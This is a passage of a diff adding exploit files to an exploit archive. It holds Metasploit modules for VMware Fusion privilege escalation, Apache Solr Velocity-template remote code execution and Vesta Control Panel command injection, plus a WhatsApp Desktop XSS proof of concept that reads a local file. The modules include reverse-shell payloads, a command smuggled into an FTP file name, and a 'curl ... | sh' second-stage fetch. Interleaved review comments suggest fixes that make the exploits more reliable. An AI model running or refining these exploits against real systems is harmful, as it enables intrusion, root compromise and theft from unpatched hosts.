"#{get_home_dir}/Contents" + end + + def base_dir + "#{content_dir}/Library/services/" + end + + def kill_process(executable) + pid_kill = cmd_exec %(ps ax | grep #{executable} | grep -v grep | awk '{print "kill -9 " $1}') + cmd_exec pid_kill + end + + def get_version + # Thanks to @ddouhine on github for this answer! + version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString" + /=> "(?\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw #supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2 + if version_raw.blank? 
+ fail_with Failure::BadConfig, 'Unable to determine VMware Fusion version. Set ForceExploit to override.' + end + Gem::Version.new(version) + end + + def pre_11_5_3 + # Upload payload executable & chmod + payload_filename = "#{base_dir}#{usb_service}" + print_status "Uploading Payload: #{payload_filename}" + write_file payload_filename, generate_payload_exe + chmod payload_filename, 0o755 + register_file_for_cleanup payload_filename + + # create folder structure and hard link to the original binary + root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later + link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/" + cmd_exec "mkdir -p #{link_folder}" + cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'" + print_status "Created folder (#{link_folder}) and link" + + print_status 'Starting USB Service (5 sec pause)' + # XXX: The ; used by cmd_exec will interfere with &, so pad it with : + cmd_exec "cd #{link_folder}; '#{link_folder}/#{open_usb_service}' & :" + Rex.sleep 5 # give time for the service to execute our payload + print_status 'Killing service' + cmd_exec "pkill '#{open_usb_service}'" + print_status "Deleting #{root_link_folder}" + rm_rf root_link_folder + end + + def exactly_11_5_3 + # Upload payload executable & chmod + payload_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}" + print_status "Uploading Payload to #{payload_name}" + write_file payload_name, generate_payload_exe + chmod payload_name, 0o755 + #create race with codesign check + root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later + link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/" + print_status 'Uploading race condition executable.' 
+ race = <<~EOF + #!/bin/sh + while [ "1" = "1" ]; do + ln -f '/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}' '#{base_dir}#{usb_service}' + ln -f '#{payload_name}' '#{base_dir}#{usb_service}' + done + EOF + racer_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}" + upload_and_chmodx racer_name, race + register_file_for_cleanup racer_name + register_dirs_for_cleanup root_link_folder + # create the hard link + print_status "Creating folder (#{link_folder}) and link" + cmd_exec "mkdir -p #{link_folder}" + cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'" + + # create the launcher to start the racer and keep launching our service to attempt to win + launcher = <<~EOF + #!/bin/sh + #{racer_name} & + for i in {1..#{datastore['MAXATTEMPTS']}} + do + echo "attempt $i"; + '#{link_folder}#{open_usb_service}' + done + EOF + runner_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}" + upload_and_chmodx runner_name, launcher + register_file_for_cleanup runner_name + + print_status "Launching Exploit #{runner_name} (sleeping 15sec)" + # XXX: The ; used by cmd_exec will interfere with &, so pad it with : + results = cmd_exec "#{runner_name} & :" + Rex.sleep 15 # give time for the service to execute our payload + vprint_status results + + print_status 'Exploit Finished, killing scripts.' + kill_process racer_name + kill_process runner_name # in theory should be killed already but just in case + kill_process "'#{link_folder}#{open_usb_service}'" + # kill_process 'ln' a rogue ln -f may mess us up, but killing them seemed to be unreliable and mark the exploit as failed. + # above caused: [-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Unknown error + # rm_rf base_dir # this always fails. Leaving it here as a note that when things dont kill well, can't delete the folder + end + + def check + unless exists? 
"/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}" + print_bad "'#{open_usb_service}' binary missing" + return CheckCode::Safe + end + version = get_version + if version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.3')) + vprint_good "Vmware Fusion #{version} is exploitable" + else + print_bad "VMware Fusion #{version} is NOT exploitable" + return CheckCode::Safe + end + CheckCode::Appears + end + + def exploit + # First check the system is vulnerable, or the user wants to run regardless + unless check == CheckCode::Appears + unless datastore['ForceExploit'] + fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' + end + print_warning 'Target does not appear to be vulnerable' + end + + # Check if we're already root + if is_root? + unless datastore['ForceExploit'] + fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override' + end + end + + # Make sure we can write our payload to the remote system + rm_rf content_dir # live dangerously. + if directory? content_dir + fail_with Filure::BadConfig, "#{content_dir} exists. Unable to delete automatically. Please delete or exploit will fail." + end + cmd_exec "mkdir -p #{base_dir}" + register_dirs_for_cleanup content_dir + unless writable? base_dir + fail_with Failure::BadConfig, "#{base_dir} is not writable." + end + + version = get_version + if version == Gem::Version.new('11.5.3') + vprint_status 'Using 11.5.3 exploit' + exactly_11_5_3 + elsif version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.2')) + vprint_status 'Using pre-11.5.3 exploit' + pre_11_5_3 + end + rm_rf content_dir # live dangerously. + end +end \ No newline at end of file diff --git a/exploits/multiple/remote/48338.rb b/exploits/multiple/remote/48338.rb new file mode 100755 index 000000000..f2080902b --- /dev/null +++ b/exploits/multiple/remote/48338.rb 
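Review bot: `fail_with Filure::BadConfig, ...` in `exploit` misspells `Failure`, so the branch where `content_dir` could not be removed raises a NameError instead of the intended message; change it to `fail_with Failure::BadConfig, "#{content_dir} exists. Unable to delete automatically. Please delete or exploit will fail."`. The `rm_rf content_dir` two lines above it removes `$HOME/Contents` unconditionally before the directory is even inspected, which silently destroys whatever a user already kept there; a reviewer would want `print_warning "#{content_dir} exists and will be removed" if directory? content_dir` (or a hard `fail_with Failure::BadConfig`) ahead of the removal, and the same applies to the trailing `rm_rf content_dir`. In `get_version` the pattern reads `/=> "(?\d{0,2}\.\d{0,2}\.\d{0,2})"/`, where the named-capture name appears to have been lost in this rendering (presumably `(?<version>...)`, since `Gem::Version.new(version)` depends on that local), and `version_raw.blank?` does not cover a non-matching regex, so `version` can reach `Gem::Version.new` as nil when the plist line has an unexpected shape.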
@@ -0,0 +1,504 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/powershell' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::CmdStager + include Msf::Exploit::Powershell + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Apache Solr Remote Code Execution via Velocity Template', + 'Description' => %q( + This module exploits a vulnerability in Apache Solr <= 8.3.0 which allows remote code execution via a custom + Velocity template. Currently, this module only supports Solr basic authentication. + + From the Tenable advisory: + An attacker could target a vulnerable Apache Solr instance by first identifying a list + of Solr core names. Once the core names have been identified, an attacker can send a specially crafted + HTTP POST request to the Config API to toggle the params resource loader value for the Velocity Response + Writer in the solrconfig.xml file to true. Enabling this parameter would allow an attacker to use the Velocity + template parameter in a specially crafted Solr request, leading to RCE. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 's00py', # Discovery and PoC + 'jas502n', # exploit code on Github + 'AleWong', # ExploitDB contribution, and exploit code on Github + 'Imran E. 
Dawoodjee ' # Metasploit module + ], + 'References' => + [ + [ 'EDB', '47572' ], + [ 'CVE', '2019-17558' ], + [ 'URL', 'https://www.tenable.com/blog/apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability'], + [ 'URL', 'https://www.huaweicloud.com/en-us/notice/2018/20191104170849387.html'], + [ 'URL', 'https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133/'], + [ 'URL', 'https://github.com/jas502n/solr_rce'], + [ 'URL', 'https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template'], + ], + 'Platform' => ['linux', 'unix', 'win'], + 'Targets' => + [ + [ + 'Unix (in-memory)', + { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } + } + ], + [ + 'Linux (dropper)', + { + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :linux_dropper, + 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }, + 'CmdStagerFlavor' => %w[curl wget] + } + ], + [ + 'x86/x64 Windows PowerShell', + { + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :windows_psh, + 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' } + } + ], + [ + 'x86/x64 Windows CmdStager', + { + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :windows_cmdstager, + 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'vbs' }, + 'CmdStagerFlavor' => %w[vbs certutil] + } + ], + [ + 'Windows Exec', + { + 'Platform' => 'win', + 'Arch' => ARCH_CMD, + 'Type' => :windows_exec, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/generic' } + } + ], + ], + 'DisclosureDate' => "2019-10-29", # ISO-8601 formatted + 'DefaultTarget' => 0, + 'Privileged' => false + ) + ) + + register_options( + [ + Opt::RPORT(8983), + OptString.new('USERNAME', [false, 'Solr username', 'solr']), + OptString.new('PASSWORD', [false, 'Solr password', 'SolrRocks']), + OptString.new('TARGETURI', [false, 'Path to Solr', 
'/solr/']) + ] + ) + end + + # if we are going to exploit, we only need one core to be exploitable + @vuln_core = "" + # OS specific stuff + @target_platform = "" + # if authentication is used + @auth_string = "" + + def check_auth + # see if authentication is required for the specified Solr instance + auth_check = solr_get('uri' => normalize_uri(target_uri.path)) + + # successfully connected? + unless auth_check + print_bad("Connection failed!") + return nil + end + + # if response code is not 200, then the Solr instance definitely requires authentication + unless auth_check.code == 200 + # if authentication is required and creds are not provided, we cannot reliably check exploitability + if datastore['USERNAME'] == "" && datastore['PASSWORD'] == "" + print_bad("Credentials not provided, skipping credentialed check...") + return nil + end + + # otherwise, try the given creds + auth_string = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) + attempt_auth = solr_get('uri' => normalize_uri(target_uri.path), 'auth' => auth_string) + + # successfully connected? + unless attempt_auth + print_bad("Connection failed!") + return nil + end + # if the return code is not 200, then authentication definitely failed + unless attempt_auth.code == 200 + print_bad("Invalid credentials!") + return nil + end + + store_valid_credential( + user: datastore['USERNAME'], + private: datastore['PASSWORD'], + private_type: :password, + proof: attempt_auth.to_s + ) + + @auth_string = auth_string + end + # a placeholder return value. Not requiring auth should throw no errors + "" + end + + # check for vulnerability existence + def check + auth_res = check_auth + unless auth_res + return CheckCode::Unknown("Authentication failed!") + end + + # send a GET request to get Solr and system details + ver = solr_get('uri' => normalize_uri(target_uri.path, '/admin/info/system'), 'auth' => @auth_string) + + # can't connect? 
that's an automatic failure + unless ver + return CheckCode::Unknown("Connection failed!") + end + + # convert to JSON + ver_json = ver.get_json_document + # get Solr version + solr_version = Gem::Version.new(ver_json['lucene']['solr-spec-version']) + print_status("Found Apache Solr #{solr_version}") + # get OS version details + @target_platform = ver_json['system']['name'] + target_arch = ver_json['system']['arch'] + target_osver = ver_json['system']['version'] + print_status("OS version is #{@target_platform} #{target_arch} #{target_osver}") + # uname doesn't show up for Windows, so run a check for that + if ver_json['system']['uname'] + # print uname only when verbose + vprint_status("Full uname is '#{ver_json['system']['uname'].strip}'") + end + + # the vulnerability is only present in Solr versions <= 8.3.0 + unless solr_version <= Gem::Version.new('8.3.0') + return CheckCode::Safe("Running version of Solr is not vulnerable!") + end + + # enumerate cores + cores = solr_get('uri' => normalize_uri(target_uri.path, '/admin/cores'), 'auth' => @auth_string) + + # can't connect? that's yet another automatic failure + unless cores + return CheckCode::Unknown("Could not enumerate cores!") + end + + # convert to JSON yet again + cores_json = cores.get_json_document + # draw up an array of all the cores + cores_list = Array.new + # get the core names + cores_json['status'].keys.each do |core_name| + cores_list.push(core_name) + end + + # no cores? that means nothing to exploit. + if cores_list.empty? + return CheckCode::Safe("No cores found, nothing to exploit!") + end + + # got cores? tell the operator which cores were found + print_status("Found core(s): #{cores_list.join(', ')}") + possibly_vulnerable_cores = {} + + cores_list.each do |core| + # for each core, attempt to get config + core_config = solr_get('uri' => normalize_uri(target_uri.path, core.to_s, 'config'), 'auth' => @auth_string) + + # can't retrieve configuration for that core? 
go next + unless core_config + print_error("Could not retrieve configuration for core #{core}!") + next + end + + # convert to JSON + core_config_json = core_config.get_json_document + # if the core configuration does not include the Velocity Response Writer, it isn't vulnerable + if core_config_json['config']['queryResponseWriter'].keys.include?("velocity") + vprint_good("Found Velocity Response Writer in use by core #{core}") + if core_config_json['config']['queryResponseWriter']['velocity']['params.resource.loader.enabled'] == "true" + vprint_good("params.resource.loader.enabled for core '#{core}' is set to true.") + possibly_vulnerable_cores.store(core, true) + else + # if params.resource.loader.enabled is false, we need to set it to true before exploitation + print_warning("params.resource.loader.enabled for core #{core} is set to false.") + possibly_vulnerable_cores.store(core, false) + end + else + vprint_error("Velocity Response Writer not found in core #{core}") + next + end + end + + # look at the array of possibly vulnerable cores + if possibly_vulnerable_cores.empty? + CheckCode::Safe("No cores are vulnerable!") + else + # if possible, pick a core that already has params.resource.loader.enabled set to true + possibly_vulnerable_cores.each do |core| + if core[1] == true + @vuln_core = core + break + end + end + # otherwise, just pick the first one + if @vuln_core.to_s == "" + @vuln_core = possibly_vulnerable_cores.first + end + CheckCode::Vulnerable + end + end + + # the exploit method + def exploit + unless [CheckCode::Vulnerable].include? check + fail_with Failure::NotVulnerable, "Target is most likely not vulnerable!" 
+ end + + print_status("Targeting core '#{@vuln_core[0]}'") + + # if params.resource.loader.enabled for that core is false + if @vuln_core[1] != true + # the new config in JSON format + enable_params_resource_loader = { + "update-queryresponsewriter": { + "startup": "lazy", + "name": "velocity", + "class": "solr.VelocityResponseWriter", + "template.base.dir": "", + "solr.resource.loader.enabled": "true", + "params.resource.loader.enabled": "true" + } + }.to_json + + opts_post = { + 'method' => 'POST', + 'connection' => 'Keep-Alive', + 'ctype' => 'application/json;charset=utf-8', + 'encode_params' => false, + 'uri' => normalize_uri(target_uri.path, @vuln_core[0].to_s, 'config'), + 'data' => enable_params_resource_loader + } + + unless @auth_string == "" + opts_post.store('authorization', @auth_string) + end + + print_status("params.resource.loader.enabled is false, setting it to true...") + update_config = send_request_cgi(opts_post) + + unless update_config + fail_with Failure::Unreachable, "Connection failed!" + end + + # if we got anything other than a 200 back, the configuration update failed and the exploit won't work + unless update_config.code == 200 + fail_with Failure::UnexpectedReply, "Unable to update config, exploit failed!" + end + + print_good("params.resource.loader.enabled is now set to true!") + end + + # windows... + if @target_platform.include? "Windows" + # if target is wrong, warn and exit before doing anything + unless target.name.include? "Windows" + fail_with Failure::NoTarget, "Target is found to be Windows, please select the proper target!" + end + + case target['Type'] + # PowerShell... + when :windows_psh + # need PowerShell for this + winenv_path = execute_command("C:\\Windows\\System32\\cmd.exe /c PATH", 'auth_string' => @auth_string, 'core_name' => @vuln_core[0], 'winenv_check' => true) + unless winenv_path + fail_with Failure::Unreachable, "Connection failed!" + end + + # did the command to check for PATH execute? 
+ unless winenv_path.code == 200 + fail_with Failure::UnexpectedReply, "Unexpected reply from target, aborting!" + end + + # is PowerShell in PATH? + if /powershell/i =~ winenv_path.body.to_s + # only interested in the contents of PATH. Everything before it is irrelevant + paths = winenv_path.body.split('=')[1] + # confirm that PowerShell exists in the PATH by checking each one + paths.split(';').each do |path_val| + # if PowerShell exists in PATH, then we are good to go + unless /powershell/i =~ path_val + next + end + + print_good("Found Powershell at #{path_val}") + # generate PowerShell command, encode with base64, and remove comspec + psh_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true) + # specify full path to PowerShell + psh_cmd.insert(0, path_val) + # exploit the thing + execute_command(psh_cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0]) + break + end + else + fail_with Failure::BadConfig, "PowerShell not found!" + end + # ... CmdStager ... + when :windows_cmdstager + print_status("Sending CmdStager payload...") + execute_cmdstager(linemax: 7130, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0]) + # ... or plain old exec? + when :windows_exec + cmd = "C:\\Windows\\System32\\cmd.exe /c #{payload.encoded}" + execute_command(cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0]) + end + end + + # ... or nix-based? + if @target_platform.include? "Linux" + # if target is wrong, warn and exit before doing anything + if target.name.include? "Windows" + fail_with Failure::NoTarget, "Target is found to be nix-based, please select the proper target!" + end + + case target['Type'] + when :linux_dropper + execute_cmdstager('auth_string' => @auth_string, 'core_name' => @vuln_core[0]) + when :unix_memory + cmd = "/bin/bash -c $@|/bin/bash . 
echo #{payload.encoded}" + execute_command(cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0]) + end + end + end + + # some prep work has to be done to work around the limitations of Java's Runtime.exec() + def execute_cmdstager_begin(_opts) + if @target_platform.include? "Windows" + @cmd_list.each do |command| + command.insert(0, "C:\\Windows\\System32\\cmd.exe /c ") + end + else + @cmd_list.each do |command| + command.insert(0, "/bin/bash -c $@|/bin/bash . echo ") + end + end + end + + # sic 'em, bois! + def execute_command(cmd, opts = {}) + # custom template which enables command execution + template = <<~VELOCITY + #set($x="") + #set($rt=$x.class.forName("java.lang.Runtime")) + #set($chr=$x.class.forName("java.lang.Character")) + #set($str=$x.class.forName("java.lang.String")) + VELOCITY + + # attempts to solve the quoting problem, partially successful + if target.name.include?("Unix") + template += <<~VELOCITY + #set($ex=$rt.getRuntime().exec("#{cmd}")) + VELOCITY + else + template += <<~VELOCITY + #set($ex=$rt.getRuntime().exec('#{cmd}')) + VELOCITY + end + + template += <<~VELOCITY + $ex.waitFor() + VELOCITY + + # the next 2 lines cause problems with CmdStager, so it's only used when needed + # during the check for PowerShell existence, or by specific payloads + if opts['winenv_check'] || target['Type'] == :windows_exec || target['Type'] == :unix_memory + template += <<~VELOCITY + #set($out=$ex.getInputStream()) + #if($out.available()) + #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end + #else + #end + VELOCITY + end + + # execute the exploit... 
+ raw_result = solr_get( + 'uri' => normalize_uri(target_uri.path, opts['core_name'].to_s, 'select'), + 'auth' => opts['auth_string'], + 'vars_get' => { + 'q' => '1', + 'wt' => 'velocity', + 'v.template' => 'custom', + 'v.template.custom' => template + } + ) + + # Executing PATH always gives a result, so it can return safely + if opts['winenv_check'] + return raw_result + end + + # for printing command output + unless raw_result.nil? + unless raw_result.code == 200 + fail_with Failure::PayloadFailed, "Payload failed to execute!" + end + + # to get pretty output + result_inter = raw_result.body.to_s.sub("0\n", ":::").split(":::").last + unless result_inter.nil? + final_result = result_inter.split("\n").first.strip + print_good(final_result) + end + end + end + + # make sending requests easier + def solr_get(opts = {}) + send_request_cgi_opts = { + 'method' => 'GET', + 'connection' => 'Keep-Alive', + 'uri' => opts['uri'] + } + + # @auth_string defaults to "" if no authentication is necessary + # otherwise, authentication is required + if opts['auth'] != "" + send_request_cgi_opts.store('authorization', opts['auth']) + end + + # a bit unrefined, but should suffice in this case + if opts['vars_get'] + send_request_cgi_opts.store('vars_get', opts['vars_get']) + end + + send_request_cgi(send_request_cgi_opts) + end +end \ No newline at end of file diff --git a/exploits/multiple/webapps/48294.rb b/exploits/multiple/webapps/48294.rb new file mode 100755 index 000000000..53c997d1a --- /dev/null +++ b/exploits/multiple/webapps/48294.rb 
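Review bot: The defaults `@vuln_core = ""`, `@target_platform = ""` and `@auth_string = ""` are written in the class body, so they land on the class object and every module instance starts with those ivars as nil; the guards `if opts['auth'] != ""` in `solr_get` and `unless @auth_string == ""` in `exploit` therefore never match on an unauthenticated target and a nil `'authorization'` is handed to `send_request_cgi` (likely harmless if the HTTP client drops a nil header, but the intent is lost). Move the three assignments into `initialize` after `register_options`, e.g. `@vuln_core = ""`, `@target_platform = ""`, `@auth_string = ""`, or test with `opts['auth'].to_s.empty?`; `@target_platform` is also later used with `.include?`, so a missing `system.name` key in the info JSON raises instead of failing cleanly. Separately, the Config API POST flips `params.resource.loader.enabled` to true in the core's config overlay and nothing restores it once the payload has run, leaving the target more exposed than before; a cleanup that re-posts the same `update-queryresponsewriter` document with `"params.resource.loader.enabled": "false"` whenever `@vuln_core[1] != true` was taken would be worth adding.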
@@ -0,0 +1,239 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Ftp + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "Vesta Control Panel Authenticated Remote Code Execution", + 'Description' => %q{ + This module exploits command injection vulnerability in v-list-user-backups bash script file. + Low privileged authenticated users can execute arbitrary commands under the context of the root user. + + An authenticated attacker with a low privileges can inject a payload in the file name starts with dot. + During the user backup process, this file name will be evaluated by the v-user-backup bash scripts. As + result of that backup process, when an attacker try to list existing backups injected payload will be + executed. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/'], + ['CVE', '2020-10808'] + ], + 'DefaultOptions' => + { + 'SSL' => true, + 'RPORT' => 8083, + 'WfsDelay' => 300, + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [[ 'Automatic', { }]], + 'Privileged' => false, + 'DisclosureDate' => "Mar 17 2020", + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RPORT(8083), + OptString.new('USERNAME', [true, 'The username to login as']), + OptString.new('PASSWORD', [true, 'The password to login with']), + OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']) + ] + ) + deregister_options('FTPUSER', 'FTPPASS') + end + + def username + datastore['USERNAME'] + end + + def password + datastore['PASSWORD'] + end + + def login + # + # This is very simple login process. Nothing important. + # We will be using cookie and csrf_token across the module so that we are global variable. + # + print_status('Retrieving cookie and csrf token values') + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'login', '/'), + }) + + if res && res.code == 200 && !res.get_cookies.empty? + @cookie = res.get_cookies + @csrf_token = res.body.scan(//).flatten[0] || '' + if @csrf_token.empty? 
+ fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.') + end + else + fail_with(Failure::Unknown, 'Something went wrong.') + end + print_good('Cookie and CSRF token values successfully retrieved') + + print_status('Authenticating to HTTP Service with given credentials') + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'login', '/'), + 'cookie' => @cookie, + 'vars_post' => { + 'token' => @csrf_token, + 'user' => username, + 'password' => password + } + }) + + if res && res.code == 302 && !res.get_cookies.empty? + print_good('Successfully authenticated to the HTTP Service') + @cookie = res.get_cookies + else + fail_with(Failure::Unknown, 'Credentials are not valid.') + end + end + + def is_scheduled_backup_running + res = trigger_scheduled_backup + # + # MORE explaination. + # + if res && res.code == 302 + res = trigger_payload + if res.body.include?('An existing backup is already running. Please wait for that backup to finish.') + return true + else + print_good('It seems scheduled backup is done ..! Triggerring payload <3') + return false + end + else + fail_with(Failure::Unknown, 'Something went wrong. Did you get your session ?') + end + return false + end + + def trigger_payload + res = send_request_cgi({ + 'method' => 'GET', + 'cookie' => @cookie, + 'uri' => normalize_uri(target_uri.path, 'list', 'backup', '/'), + }) + if res && res.code == 200 + res + else + fail_with(Failure::Unknown, 'Something went wrong. Maybe session timed out ?') + end + end + + def trigger_scheduled_backup + res = send_request_cgi({ + 'method' => 'GET', + 'cookie' => @cookie, + 'uri' => normalize_uri(target_uri.path, 'schedule', 'backup', '/'), + }) + if res && res.code == 302 && res.headers['Location'] =~ /\/list\/backup\// + res + else + fail_with(Failure::Unknown, 'Something went wrong.') + end + end + + def payload_implant + # + # Our payload will be placed as a file name on FTP service. 
+ # Payload lenght can't be more then 255 and SPACE can't be used because of the + # bug in the backend software. Due to these limitations, I used web delivery method. + # + # When the initial payload executed. It will execute very short perl command, which is going to fetch + # actual python meterpreter first stager and execute it. + # + final_payload = "curl -sSL #{@second_stage_url} | sh".to_s.unpack("H*").first + p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'" + + # Yet another datastore variable overriding. + if datastore['SSL'] + ssl_restore = true + datastore['SSL'] = false + end + port_restore = datastore['RPORT'] + datastore['RPORT'] = 21 + datastore['FTPUSER'] = username + datastore['FTPPASS'] = password + + # + # Connecting to the FTP service with same creds as web ui. + # Implanting the very first stage of payload as a empty file. + # + if (not connect_login) + fail_with(Failure::Unknown, 'Unable to authenticate to FTP service') + end + print_good('Successfully authenticated to the FTP service') + + res = send_cmd_data(['PUT', ".a';$(#{p});'"], "") + if res.nil? + fail_with(Failure::UnexpectedReply, "Failed to upload the payload to FTP server") + end + print_good('Successfully uploaded the payload as a file name') + disconnect + + # Revert datastore variables. + datastore['RPORT'] = port_restore + datastore['SSL'] = true if ssl_restore + end + + def exploit + start_http_server + payload_implant + login + trigger_scheduled_backup + print_good('Scheduled backup has ben started. Exploitation may take up to 5 minutes.') + while is_scheduled_backup_running == true + print_status('It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...') + Rex.sleep(30) + end + stop_service + end + + def on_request_uri(cli, request) + print_good('First stage is executed ! 
Sending 2nd stage of the payload') + second_stage = "python -c \"#{payload.encoded}\"" + send_response(cli, second_stage, {'Content-Type'=>'text/html'}) + end + + def start_http_server + # + # HttpClient and HttpServer use same SSL variable :( + # We don't need a SSL for payload delivery. + # + if datastore['SSL'] + ssl_restore = true + datastore['SSL'] = false + end + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => resource_uri + }}) + print_status("Second payload download URI is #{get_uri}") + # We need that global variable since get_uri keep using SSL from datastore + # We have to get the URI before restoring the SSL. + @second_stage_url = get_uri + datastore['SSL'] = true if ssl_restore + end +end \ No newline at end of file diff --git a/exploits/multiple/webapps/48295.txt b/exploits/multiple/webapps/48295.txt new file mode 100644 index 000000000..7e0e139ae --- /dev/null +++ b/exploits/multiple/webapps/48295.txt 
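Review bot: The `while is_scheduled_backup_running == true` loop in `exploit` has no upper bound, so a backup that keeps reporting "already running" makes the module poll every 30 seconds forever even though `WfsDelay` (300 by default) is declared for exactly this wait; bound it with `deadline = Time.now + datastore['WfsDelay']` before the loop and `while is_scheduled_backup_running && Time.now < deadline`, then `fail_with(Failure::TimeoutExpired, ...)` if the deadline passes. Note also that every poll re-issues the GET to `/schedule/backup/` before listing backups, so each iteration schedules another backup rather than just checking on the first one — if that is intended the `# MORE explaination.` placeholder in `is_scheduled_backup_running` should say so, and the `if res && res.code == 302` branch there is always taken because `trigger_scheduled_backup` already fails on anything else. The `scan(//)` in `login` appears to have lost its pattern in this rendering; if the source really has an empty regex it would never extract the token, so that is worth confirming against the original.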
@@ -0,0 +1,42 @@
+# Title: WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting
+# Date: 2020-01-21
+# Exploit Author: Gal Weizman
+# Vendor Homepage: https://www.whatsapp.com
+# Software Link: https://web.whatsapp.com/desktop/windows/release/x64/WhatsAppSetup.exe
+# Software Link: https://web.whatsapp.com/desktop/mac/files/WhatsApp.dmg
+# Version: 0.3.9308
+# Tested On: Mac OS, Windows, iPhone
+# CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-18426
+
+// step 1: open WhatsApp Web and enter a conversation (Will only work on WhatsApp Web source code as compiled with version 0.3.9308)
+// step 2: open devtools and search in all files "t=e.id"
+// step 3: after prettifying, set a breakpoint at the line where "t = e.id" can be found
+// step 4: paste "https://example.com" in the text box and hit "Enter"
+// step 5: when the code stops at the breakpoint, paste the following exploit code in the console and hit "Enter"
+
+var payload = `(async function() {
+ alert(navigator.userAgent);
+ (async function() {
+ // read "file:///C:/windows/system32/drivers/etc/hosts" content
+ const r = await fetch(atob('ZmlsZTovLy9DOi93aW5kb3dzL3N5c3RlbTMyL2RyaXZlcnMvZXRjL2hvc3Rz'));
+ const t = await r.text();
+ alert(t);
+ }())
+}())`;
+
+payload = `javascript:"https://example.com";eval(atob("${btoa(payload)}"))`;
+
+e.__x_matchedText = payload;
+
+e.__x_body = `
+ Innocent text
+
+ ${payload}
+
+ More Innocent text
+`;
+
+// step 6: press F8 in order for the execution to continue
+// result: a message should be sent to the victim that once is clicked will execute the payload above
+
+// further information: https://github.com/weizman/CVE-2019-18426
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48376.txt b/exploits/multiple/webapps/48376.txt
new file mode 100644
index 000000000..af82da422
--- /dev/null
+++ b/exploits/multiple/webapps/48376.txt
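Review bot: The header says `Tested On: Mac OS, Windows, iPhone`, but the file-read stage of `payload` fetches a Windows-only path (the base64 argument to `atob` decodes to `file:///C:/windows/system32/drivers/etc/hosts`, as the comment above it says), so on the macOS client only the `alert(navigator.userAgent)` stage demonstrates anything. A comment next to step 5 such as `// NOTE: the file:// read below targets the Windows client; substitute a macOS path (presumably file:///etc/hosts) when testing the .dmg build` would save readers a run that silently shows only the first alert.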
@@ -0,0 +1,40 @@
